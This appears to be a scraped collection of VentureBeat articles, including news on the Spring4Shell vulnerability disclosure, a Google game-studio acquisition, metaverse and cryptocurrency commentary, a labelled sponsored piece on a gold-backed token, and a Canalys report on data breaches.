"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Spring4Shell vulnerability likely to affect real-world apps, analyst says Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. More answers are emerging about the potential risks associated with a newly disclosed remote code execution (RCE) vulnerability in Spring Core, known as Spring4Shell — with new evidence pointing to a possible impact on real-world applications. While researchers have noted that comparisons between Spring4Shell and the critical Log4Shell vulnerability are likely inflated , analysts Colin Cowie and Will Dormann separately posted confirmations Wednesday, showing that they were able to get an exploit for the Spring4Shell vulnerability to work against sample code supplied by Spring. “If the sample code is vulnerable, then I suspect there are indeed real-world apps out there that are vulnerable to RCE,” Dormann said in a tweet. Still, as of this writing, it’s not clear how broad the impact of the vulnerability might be, or which specific applications might be vulnerable. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! That alone would appear to suggest that the risk associated with Spring4Shell is not comparable to that of Log4Shell, a high-severity RCE vulnerability that was disclosed in December. The vulnerability affected the widely used Apache Log4j logging library, and was believed to have impacted most organizations. Still to-be-determined about Spring4Shell, Dormann said on Twitter, is the question of “what actual real-world applications are vulnerable to this issue?” “Or is it likely to affect mostly just custom-built software that uses Spring and meets the list of requirements to be vulnerable,” he said in a tweet. Spring is a popular framework used in the development of Java web applications. Vulnerability details Researchers at several cybersecurity firms have analyzed and published details on the Spring4Shell vulnerability, which was disclosed on Tuesday. At the time of this writing, patches are not currently available. Security engineers at Praetorian said Wednesday that the vulnerability affects Spring Core on JDK (Java Development Kit) 9 and above. The RCE vulnerability stems from a bypass of CVE-2010-1622 , the Praetorian engineers said. The Praetorian engineers said they have developed a working exploit for the RCE vulnerability. “We have disclosed full details of our exploit to the Spring security team, and are holding off on publishing more information until a patch is in place,” they said in a blog post. (Importantly, the Spring4Shell vulnerability is different from the Spring Cloud vulnerability that is tracked at CVE-2022-22963 and that, confusingly, was disclosed at around the same time as Spring4Shell.) The bottom line with Spring4Shell is that while it shouldn’t be ignored, “this vulnerability is NOT as bad” as the Log4Shell vulnerability , cybersecurity firm LunaSec said in a blog post. All attack scenarios with Spring4Shell, LunaSec said, “are more complex and have more mitigating factors than Log4Shell did.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,104
2,022
"AR/VR News | VentureBeat"
"https://venturebeat.com/category/arvr"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages AR/VR Why the lack of metaverse integration in today’s VR ecosystem needs to be addressed The misperception of 3D perception: Debunking notions from cost to capabilities Jadu launches NFT avatars as it prepares for the AR metaverse VR basketball app Gym Class raises $8M ahead of fall launch Community Understanding the evolution of the metaverse for business Community The metaverse: A safe space for all? Community The metaverse in retail: A game-changer that’s not ready yet Community How big data could form the cornerstone of the metaverse Immersive Gamebox announces full-scale interactive Squid Game Meta increases the price of Meta Quest 2 VR headsets by $100 Hackers can see what you’re doing in VR via Big Brother malware Community Designing the metaverse: Challenges and questions Community Medicine and the metaverse: New tech allows doctors to travel inside of your body Community Why the metaverse won’t fall to Clubhouse’s fate Community Improving the customer experience with virtual and augmented reality The DeanBeat: RP1 simulates putting 4,000 people together in a single metaverse plaza MeetKai launches AI-powered metaverse, starting with a billboard in Times Square Magic Leap 2 mixed reality headsets for enterprise will debut for $3,300 on September 30 Beyond Inclusion builds workforce diversity for the metaverse Community A new milestone in augmented reality: Functional contact lenses Community We should replicate the unique properties of cash in the digital realm Community Web3 gaming has bigger challenges than the crypto winter VR enthusiasts can finally cut the Facebook cord next month Resolution Games reveals record growth in VR/AR game downloads Community Three ways augmented reality affects consumer psychology Echo3D raises $5.5M for cloud authoring tools for 3D, AR, and VR content Community How NFTs in the metaverse can improve the value of physical assets in the real world Rec Room hits 75M lifetime users and $1M in creator payouts for Q1 Community In a world where AR/VR is widely adopted by the population, what will advertising look like? Mark Zuckerberg unveils ultra-realistic VR display prototypes Community The future of the creator economy in a Web3 world Community Can humanity be recreated in the metaverse? Nreal is bringing Steam to AR, and hosting a hackathon Kaleidoco raises $7M to blend Web3 and AR entertainment Blippar facilitates AR content creation through its integration with Microsoft Teams Community Strategies for the ecommerce metaverse journey Community Entering the metaverse: How companies can take their first virtual steps Community Web3 is a myth, and that’s okay Community Why leaders need to prepare to run a blended reality business Among Us VR set to launch during holiday season, gets new trailer 2023 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov 2022 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec 2021 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec 2020 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec 2019 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec 2018 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec 2017 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec 2016 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec 2015 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec 2014 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,105
2,017
"Google bags Job Simulator studio Owlchemy Labs in VR's latest exit | VentureBeat"
"https://venturebeat.com/2017/05/10/google-gets-into-vr-game-development-with-acquisition-of-job-simulators-owlchemy-labs"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Google bags Job Simulator studio Owlchemy Labs in VR’s latest exit Share on Facebook Share on X Share on LinkedIn Rick and Morty now work for Google. Are you looking to showcase your brand in front of the brightest minds of the gaming industry? Consider getting a custom GamesBeat sponsorship. Learn more. One of the most successful virtual reality game studios is now a part of one of the world’s biggest corporations. Google revealed today that it has acquired Owlchemy Labs , the studio that is best known for developing popular HTC Vive launch game Job Simulator. This acquisition gives Google a talented in-house team that can build content for its Daydream VR headsets that work with select Android smartphones. In its blog post announcing the deal to bring Owlchemy under the Google banner, Google VR engineering director Relja Markovic explained that the company’s existing content teams will partner with Owlchemy to build new experiences. Markovic also suggested that Owlchemy will continue working on other VR platforms like Vive, Oculus Rift, and more. The two parties did not disclose how much Google spent to acquire the studio. Owlchemy has helped define VR for many people. Job Simulator is a game where you experience a museum of jobs through a series of silly interactions. The game also got a chance to prove itself to a mass audience when it appeared on the late-night program Conan. Event GamesBeat at the Game Awards We invite you to join us in LA for GamesBeat at the Game Awards event this December 7. Reserve your spot now as space is limited! Owlchemy’s followup VR game, Rick and Morty: Virtual Rick-ality debuted in April, and it presented players with a similar set of bizarre, interactive challenges. “Today, we’re thrilled to welcome Owlchemy Labs to Google,” wrote Markovic. “They’ve created award-winning games like Job Simulator and Rick and Morty: Virtual Rick-ality which have really thoughtful interactive experiences that are responsive, intuitive, and feel natural. They’ve helped set a high bar for what engagement can be like in virtual worlds, and do it all with a great sense of humor.” In January, Owlchemy revealed that Job Simulator was a sales hit. Through 2016, it grossed more than $3 million in revenues. Since debuting in April for the Vive, it has since made the move to Oculus Rift and PlayStation VR. It was so popular that the studio even released a physical version of the game for Sony’s PS4 console. This move is also indicative of Google’s commitment to VR and not just as a hardware or experiential exercise. Owlchemy is a game studio, and now Google can actively produce gaming content internally for head-mounted displays without having to necessarily work with outside partners. GamesBeat's creed when covering the game industry is "where passion meets business." What does this mean? We want to tell you how the news matters to you -- not just as a decision-maker at a game studio, but also as a fan of games. Whether you read our articles, listen to our podcasts, or watch our videos, GamesBeat will help you learn about the industry and enjoy engaging with it. Discover our Briefings. Join the GamesBeat community! Enjoy access to special events, private newsletters and more. VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,106
2,022
"What's it going to take to get cryptocurrency widely accepted? | VentureBeat"
"https://venturebeat.com/2022/01/27/whats-it-going-to-take-to-get-cryptocurrency-widely-accepted"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages VB Event What’s it going to take to get cryptocurrency widely accepted? Share on Facebook Share on X Share on LinkedIn Are you looking to showcase your brand in front of the brightest minds of the gaming industry? Consider getting a custom GamesBeat sponsorship. Learn more. The metaverse doesn’t quite exist yet, but it’s just the dusk before the dawn. And when it does finally burst into life, commerce and transactions are going to be central to so much of the activity within it. Industry experts dove into the topic today during the “Transacting in the Metaverse” panel at the GamesBeat “Into the Metaverse” Summit. Dean Takahashi, lead writer of GamesBeat, hosted Chris Smith, founder of BIG Esports, Josh Marcus, COO at Rumble Gaming, and Evan Heby, senior marketing manager of Tipalti in a wide-ranging conversation about tokens, cryptocurrencies, NFTs, and other transactions in today’s virtual spaces and tomorrow’s metaverse. There’s a long road to go before everyone feels that these forms of currency are safe and secure, and they become universal. How do we get there? “What we’re seeing is a move, first and foremost, from some of the traditional methods of payment you might see, checks and things like that, to digital versions of that, whether it’s an echeck or wire or ACH,” Heby said. “But we also predict that we’ll see even more movement as the metaverse develops, and as people build more of that trust with the cryptocurrencies, and feel that there’s a lot of value behind things like NFTs. People will start to be more willing to get paid in those forms.” Cryptocurrency will become far more trusted and far more universal when it’s the answer to a problem that needs to be solved, Smith said — and that’s part of why many gamers reject the idea of NFTs. There’s a tremendous amount of potential for things like smart contracts in a broad array of industries, from gaming and insurances, to payment platforms and processors, and contracts with talent. Event GamesBeat at the Game Awards We invite you to join us in LA for GamesBeat at the Game Awards event this December 7. Reserve your spot now as space is limited! “Blockchain isn’t going to solve everything all the time, at least not right now,” he said. “We need to have a way that it’s going to benefit [players], because otherwise we get the bad PR that we’ve seen with gamers. Triple-A gaming studios try to shove NFTs in there because it’s the cool word, the cool thing to say.” Advertising and transactions in the metaverse Heby predicted that the first major move in transactions that we’ll see in metaverses is advertising companies making land grabs, very similar to what Nike did recently within Roblox. It’s a familiar narrative of development and progress in the real world, where real estate gets bought up, and then the infrastructure gets built on that. “We’ll start seeing cutting-edge companies invest real marketing dollars — in traditional currencies, not necessarily crypto — to benefit the long-term health and wellness of their businesses,” he said. “In terms of types of transactions today, it’s still heavily based in fiat currencies like we’re talking about. But that has an opportunity to change toward crypto, toward NFTs, toward tokenization very quickly.” Companies may also start to do pop-up shops and sell clothes or merchandise, or companies like FaZe Clan might take the opportunity to make a land grab, he said. Trust, shared belief, and cryptocurrency The key to helping people understand this space is the concept of digital ownership and digital assets generally, Marcus said. A skeptic might see an artistic NFT, a poorly-drawn ape, and wonder why anyone would put a six-figure value on ownership of something they could screenshoot. “But when you unpack it, it’s not about the ape, it’s about the underlying technology that allows anyone with that technological know-how to confirm that I own the NFT to the exclusion of all others,” he said. Ownership in the real world can be considered a bundle of rights — when you buy land, you have the right to build a house on it, the right to grow vegetables on it, the right to sell it. If you can prove that you own the rights to this ape, you can also prove that you own the rights to other digital assets. You can own one of Stella Artois’ digital horses and race it against other digital horses, own land in a digital world and develop it, and charge others for the right to enter a digital world. “It’s about a shift in perception of property, the ownership of an asset not being limited only to the physical world, but expanding that to the digital world,” he said. “It’s going to take time, for sure, but as we start to see more utility in these digital assets, we’ll start to see greater acceptance and understanding of it generally.” Transaction nirvana Predictions about cryptocurrency and transactions in the metaverse can be made with varying amounts of gravitas, but no one really knows where it will end up. “The onus is not on the consumer in adopting cryptocurrency as a legitimate asset, it’s on the technological partners and on the businesses that are creating these projects,” Marcus says. And that probably means offering a frictionless value proposition for the consumer, where they gain benefits without having to dive into the nitty-gritty of how crypto actually works. In the NFT space, the virtual basketball trading cards product, NBA Top Shot, is a great example. You can withdraw and deposit cash in USD fairly easily to buy and sell, with few hoops to jump through. “But if I compare that to an NFT project on the Ethereum network like Bored Ape Yacht Club, I have to open a digital wallet, deposit my fiat currency into that, exchange it for a digital currency, pay the gas and transaction fees, and eventually convert everything back and go withdraw the money at the ATM,” he said. “The onus really isn’t on us as consumers to figure out how to make this work. But I can’t wait to see where the technology goes to make it easier.” It’s inevitable that we’ll move in this direction, Heby said. “Compare the U.S. dollar, how long it’s been around, to Bitcoin,” he said. “We have at least a hundred-plus years on it with the U.S. dollar. That’s the marketing problem. People like things that have history behind them. As we get more and more history, there are going to be some changes, and it’ll be something that becomes more widely accepted. For now, there are still transactions going on in the metaverse. There will continue to be transactions going on.” GamesBeat's creed when covering the game industry is "where passion meets business." What does this mean? We want to tell you how the news matters to you -- not just as a decision-maker at a game studio, but also as a fan of games. Whether you read our articles, listen to our podcasts, or watch our videos, GamesBeat will help you learn about the industry and enjoy engaging with it. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,107
2,022
"Why the future of the metaverse can only be decentralized | VentureBeat"
"https://venturebeat.com/2022/03/05/why-the-future-of-the-metaverse-can-only-be-decentralized"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Guest Why the future of the metaverse can only be decentralized Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. This article was contributed by Justin Sun, Permanent Representative of Grenada to the WTO and the founder of TRON The race to the metaverse is on, featuring runners and riders, including tech giants like Meta, Microsoft, and Epic, to blockchain old-schoolers like Decentraland and Somnium Space. The only problem is that it looks suspiciously like a repeat of the “format wars” we’ve seen play out time and time again. Just look at the current video streaming fiasco. We now need to subscribe to ten different streaming services to watch the shows we actually want to watch. It’s the same old cycle we’ve seen play out in decades of centralized tech, from VHS versus Betamax in the 1980s to Facebook versus MySpace a decade ago. Now, Microsoft and Meta are squaring up in their bid to dominate the virtual space. A dystopian vision? Tech stock investors can look away now, but these attempts are doomed to fail. Meta’s bid to compete with Microsoft by penetrating the enterprise workspace metaverse has already landed badly. Meanwhile, Mark Zuckerberg’s vision of a centralized Facebook-style social metaverse has been dubbed “dystopian” by one of the firm’s earliest supporters. Event GamesBeat at the Game Awards We invite you to join us in LA for GamesBeat at the Game Awards event this December 7. Reserve your spot now as space is limited! Meanwhile, Microsoft itself appears to have a zig-zag approach to realizing its metaverse ambitions. Following Meta’s renaming last year, Microsoft was quick to jump in with its announcement that Teams was to be developed into the workspace metaverse of choice, leveraging its vast base of enterprise users. Within a matter of weeks, the firm also announced it had made its biggest-ever acquisition in a takeover of gaming firm Activision Blizzard, with CEO Satya Nadella going on to tell the FT in an interview that he believes the future of the metaverse is in gaming. So under this centralized vision, we’re going to have AR-enabled PowerPoint presentations by day and 3D social networks aimed at harvesting yet more data by night. It’s hardly surprising that people aren’t getting excited. While big tech firms slug it out to realize their vision of what we want , decentralized metaverses and Web3 initiatives are currently attracting record investment, pulling in around $30 billion in venture capital last year. What can these investors see that Meta and Microsoft are missing? That the potential of Web3 as the digital infrastructure of the future cannot be overlooked when envisioning a metaverse. The power of DAOs The ideal metaverse should not only break technological barriers by offering an unparalleled user experience, but this is an opportunity to transform the big tech business model that we’ve all come to know and dislike. Rather than operating services designed to extract monetary value from users, Web3 innovators create platforms that aim to empower people. Truly autonomous creations where the users are, if not the owners in the traditional sense of the word, then the beneficiaries. The only way to think of the ideal metaverse is through the building blocks laid by decentralized autonomous organizations, or DAOs. The world is only just waking up to the transformative power of DAOs, which have made headlines for attempts to buy a copy of the US Constitution , crowdfund legal fees for Julian Assange , and lower the barriers to entry for real estate investing. In the decentralized finance movement, DAOs are now the norm rather than the exception, and now that they’re beginning to penetrate the mainstream, it’s only a matter of time before this model extends to other platforms and protocols, too. How can we be sure of this? Because from the users’ perspective, the DAO model offers unbeatable value. We all know that in the traditional social media model, we – or rather our data – are the product that generates value. Each update or “improvement” simply attempts to extract more revenue from our data. However, users don’t see any of this value – instead, it’s funneled back to shareholders. A social network based on a DAO upends this model to return value to those who generate it. Users have an ownership stake in the platform, and assuming it operates using the same ad-based revenue model, the user will receive a share of these revenues as a reward for their engagement. Unparalleled network effects The network effects of such a model would be unparalleled because the incentives are aligned. Users – let’s go crazy and just call them people now – will want their friends and family to join so they can also participate in the rewards and make the network a better place to hang out. The more people join, the more developers want to build third-party apps and services to tap into this growing community of active, engaged people who are happy to be there, and the positive cycle continues. What’s more, thanks to the underlying blockchain infrastructure, people own the assets and benefits they accrue on any given platform. In the Web2 model, we don’t own anything so we end up tied into platforms and services simply so we can benefit from the work we’ve put into them over the years. Closing a social media account means losing followers, closing a streaming service means losing playlists and access to streaming material, closing an online marketplace listing wipes out a carefully-built customer directory. In the Web3 world, we own our assets, so we can carry them with us across different platforms without fear of being penalized. This also has the potential to make assets exponentially more valuable than they are in the Web2 world. For instance, Spotify has put the world’s music library in our pockets, but the cost of doing so has reduced the value of a music track to fractions of a cent. But if a piece of music is tied to an NFT that can be owned and played on any platform or device, it becomes worth more to the listener – and the artist is the one reaping 100% of that extra value. Decentralization is the only viable model Coming back to the tension between centralized metaverses and decentralized ones, it’s unclear how the two can co-exist. Following Twitter’s lead, Meta is rumored to be rolling out NFT support for Facebook and Instagram and even launching its own NFT marketplace. It’s hard to imagine who would want to mint NFTs that only work in a closed ecosystem, but it’s even harder to imagine Meta, or any of the other big tech firms, launching NFTs that permit interoperability with the established blockchain infrastructure. So big tech has a choice. Embrace the open, decentralized nature of the future in the metaverse, or continue operating closed ecosystems that are only designed to extract value at the expense of their most valuable assets. Because once people begin to understand that Web3 empowers them to own their data, their follower counts, their customers, all the value they accrue online and take it with them, the “Web 2.0” business model is no longer attractive or sustainable. Justin Sun is the Permanent Representative of Grenada to the WTO and the founder of TRON DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,108
2,021
"How gold-backed cryptocurrency is changing the modern investment landscape | VentureBeat"
"https://venturebeat.com/2021/07/12/how-gold-backed-cryptocurrency-is-changing-the-modern-investment-landscape"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Sponsored How gold-backed cryptocurrency is changing the modern investment landscape Share on Facebook Share on X Share on LinkedIn Presented by Asia Broadband The proliferation of online markets and the introduction of new cryptocurrencies has launched a brand-new type of token. Companies are now digitizing the value proposition of gold, one of the oldest, most stable currencies in the world. The result is a liquid crypto asset backed by the benefits of physical gold. Blockchain technology enables financial leverage, liquidity, and monetized physical gold holdings. In 2021, Bitcoin and Ethereum have been the market leaders, posting record highs for investors. But then came the crash in the wake of Elon Musk’s offhanded tweets, plus China promising increased regulation. This kind of volatility attracts recreational investors who see big risks as the natural corollary of even bigger gains. But more cautious investors have stayed on the sidelines, unwilling to take those chances. Historically, gold has been a protective hedge against inflation. Experts like Timothy Ord, president and editor of The Ord Oracle predict that gold stocks could see 10X gains in the next 3 years. In addition, Wall Street gold estimates are bullish for 2021. Gold is expected to hit $2,300-$2,400 an ounce, Goldman and Citibank say, and the metal looks poised to continue that bullish trend, which started back in September 2018. This innovation comes at a time when investors have been searching for safe havens. They’re facing massive amounts of liquidity in the economy, created by government stimuluses that were designed to shield the economy from the impact of the pandemic. Tether offers a more stable crypto investment, protected from the bigger crypto market swings, but even fiat currency backed cryptos are vulnerable to potential inflation, and investors are wary how that can impact the currency’s buying power over time. To hedge against these inflation fears, investors have turned to commodity-backed cryptocurrency projects, such as those leveraging safe-haven commodities like precious metals as their store of value. For cautious investors, gold-backed tokens combine the structure of gold investments with the scarcity, flexibility, and upside potential of the crypto world. And they’re set to bridge the gaps for investors who are uncomfortable launching into the world of cryptocurrency investing, those who dislike fiat currency, and those who are looking for more secure investments. Asia Broadband, Inc. (OTC: AABB) is entering the fray with its AABB Gold token (AABBG). It’s a gold-backed currency, but the company is going a step further with its unique proposition: the gold they’re backing their token with is directly produced by their gold mines. “Backing currency with gold offers investors a major competitive advantage over other junior mining companies,” says Chris Torres, CEO of Asia Broadband, Inc. (OTC: AABB). “The unique mine-to-token product can become a worldwide standard of exchange, secured and trusted with gold backing.” The company is acquiring highly prospective gold projects in Latin America, and distributing production through an extensive global sales network. In January, Asia Broadband sold its main mining operations in the Guerrero gold belt in Mexico for $82 million. The sale produced $30 million dollars in gold bullion, which provides the backing for the company’s tokens. They’ll continue to strategically target gold mineral properties to back continuing token sales, Torres says – but if token demand exceeds the company’s supply of gold, bullion is available from third-party sources, and can be purchased using the proceeds from token sales. The minimum price of the AABBG token is maintained at the current spot price of gold, which reduces purchaser’s investment risk, Torres adds. On the flip side, the token price will rise with the price of gold. Since the pandemic, the value of gold has continued to rise, Torres says. “We believe the price of gold will increase over $2,000 to $3,000 an ounce over the next 24 months,” he explains. “And the rising price of gold is just the minimum company-supported price of our AABBG token, which adds security to investors. Most importantly, the token price will continue to appreciate based on its market demand and the limited supply of tokens available for purchase and exchange. The company has released only 5.4 million tokens to this point, or the equivalent value of the gold bullion in the company’s treasury. “In 2020, AABB saw $16.8 million gross profits, and as gold mining operations move forward, we expect revenues and gross profits to be strong in 2021 — surpassing our previous year’s achievement,” he says. The company’s primary goal is to make its token a worldwide standard of exchange, Torres says. It’s working now to aggressively expand token circulation to the primary sales markets in both North America and Europe, and also globally. The company has been developing their own propriety exchange, which will allow AABB Wallet users to complete quick two-way exchanges of their AABB Gold tokens for major cryptocurrencies such as Bitcoin, Ethereum, and Litecoin. The proprietary exchange will also add to transaction fee revenues and allow for the price appreciation of AABBG beyond the price of gold, influenced by market demand and the limited supply of tokens released into circulation. The exchange completion timeline is on path for testing in mid-August with the live exchange launch expected in early September. For more information on the AABBG token, visit www.aabbgoldtoken.com Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. Content produced by our editorial team is never influenced by advertisers or sponsors in any way. For more information, contact [email protected]. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,109
2,020
"Canalys: More data breaches in 2020 than previous 15 years despite 10% growth in cybersecurity spending | VentureBeat"
"https://venturebeat.com/2021/03/29/canalys-more-data-breaches-in-2020-than-previous-15-years-despite-10-growth-in-cybersecurity-spending"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Canalys: More data breaches in 2020 than previous 15 years despite 10% growth in cybersecurity spending Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. As cyberattacks increase, it’s hard not to wonder if enterprises are fighting a losing battle. According to a new report by Canalys , companies are spending record sums on cybersecurity, and yet the number of successful attacks is higher than ever. Canalys’ report noted that “more records were compromised in just 12 months than in the previous 15 years combined.” These are being driven in particular by ransomware attacks that have become more severe, in some cases disrupting hospitals. These attacks have also caused some companies to shut down and others to put emergency response plans in place to avoid being shuttered. This carnage is happening despite the fact that cybersecurity investment grew 10% in 2020 to $53 billion. So what’s going on? Canalys believes that companies are still under-investing in cybersecurity. During the pandemic, other areas of IT grew faster, signaling that enterprises were placing an emphasis on services that would help them remain stable during the pandemic or even grow rather than protect their infrastructure from attack. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Indeed, some enterprises may have increased their vulnerability by responding to the pandemic in ways that ignored their safety policies. But the real culprit may simply have been failing to make security a top priority. Compared to the 10% growth in cybersecurity spending, cloud infrastructure services grew 33% in 2020, cloud software services rose 20%, notebook PC shipments jumped 17%, Logitech’s webcam sales increased 138%, and wi-fi router sales surged 40%. “Cybersecurity must be front and center of digital plans, otherwise there will be a mass extinction of organizations, which will threaten the post-COVID-19 economic recovery,” said Canalys Chief Analyst Matthew Ball in a statement. “A lapse in focus on cybersecurity is already having major repercussions, resulting in the escalation of the current data breach crisis and acceleration of ransomware attacks.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,110
2,021
"Report: Flawed data management leads to lost revenue for most companies | VentureBeat"
"https://venturebeat.com/2021/11/17/report-flawed-data-management-leads-to-lost-revenue-for-most-companies"
